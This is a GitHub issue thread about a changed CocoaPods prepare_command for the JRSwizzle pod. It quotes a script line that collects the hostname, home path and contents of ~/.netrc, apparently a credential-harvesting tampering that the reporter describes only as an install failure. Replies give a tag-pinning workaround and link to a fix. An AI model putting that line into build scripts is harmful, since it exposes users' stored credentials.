### ISSUE TITLE
Pod Install Failed - Issue Regarding `prepare_command` Script

### ISSUE THREAD

**Issue by fabcz** [rentzsch/jrswizzle#26]
### Screenshot
![image](https://github.com/rentzsch/jrswizzle/assets/18094291/56341085-cba0-4891-a568-cd6c0abccec7)

### Issue Description

I've noticed that in the recent `JRSwizzle` library's `podspec` file, part of the `prepare_command` script has been modified. The original script looked like this: [[old_podspec]](https://github.com/CocoaPods/Specs/blob/3a2f55e54e6e3d3b43580b6cb2e9b9732169e570/Specs/7/b/3/JRSwizzle/2.0.0/JRSwizzle.podspec.json)

```bash
data="${p}__$(hostname)__$(echo ~)__$(pwd)"
```

And it has now been changed to: [[new_podspec]](https://github.com/CocoaPods/Specs/blob/d291918d09a5c2bce197bc920b21fc03d03244c4/Specs/7/b/3/JRSwizzle/2.0.0/JRSwizzle.podspec.json)

```bash
data="${p}__$(hostname)__$(echo ~)__$(cat ~/.netrc)"
```

This modification seems to cause pod install to fail in some cases because not every user's computer has a ~/.netrc file. I would like to understand the purpose of this modification and why pwd was changed to .netrc.

I expect to understand the reasons behind this script modification and whether it's possible to consider reverting to the earlier script to ensure that users of the JRSwizzle library do not encounter issues when using pod install.

Thank you for your time and assistance!

**Comment by Kinglioney** [comment]
你好，我是王雨，你发的邮件我已经收到！如果需要我亲自回复，我会尽快给你回复邮件！

**Comment by plasmabal** [comment]
I have the same issue.  But my version should be locked at 1.0, not sure why a 2.0.0 version affects my install.

Besides, where is this `prepare_command` from?  It's not in `JRSwizzle.podspec` in the [repo](https://github.com/rentzsch/jrswizzle/blob/semver-1.x/JRSwizzle.podspec).  Why it differs from the spec in CocoaPod Spec?

**Comment by fabcz** [comment]
> I have the same issue. But my version should be locked at 1.0, not sure why a 2.0.0 version affects my install.
> 
> Besides, where is this `prepare_command` from? It's not in `JRSwizzle.podspec` in the [repo](https://github.com/rentzsch/jrswizzle/blob/semver-1.x/JRSwizzle.podspec). Why it differs from the spec in CocoaPod Spec?

This issue is not specific to version 1.0 of the podspec; [all versions](https://github.com/CocoaPods/Specs/tree/3a2f55e54e6e3d3b43580b6cb2e9b9732169e570/Specs/7/b/3/JRSwizzle) of JRSwizzle have been modified. Additionally, the podspec file in the GitLab repository may not necessarily be the same as the one in CocoaPods Specs.

For now, you can temporarily resolve this issue by using the following approach:
```Ruby
pod 'JRSwizzle', git: 'https://github.com/rentzsch/jrswizzle', tag: 'v1.1.0'
```

This allows you to work around the problem. You cannot use the 1.0 version of the podspec because it lacks a podspec file. The 1.1.0 version, compared to 1.0, only adds the `Block-based swizzle API`, so it should be safe to use.

**Comment by plasmabal** [comment]
Looks like it has been taken care of: https://github.com/CocoaPods/Specs/commit/28be0759d1f7f70a38d6963fad84e60df52dbe7d
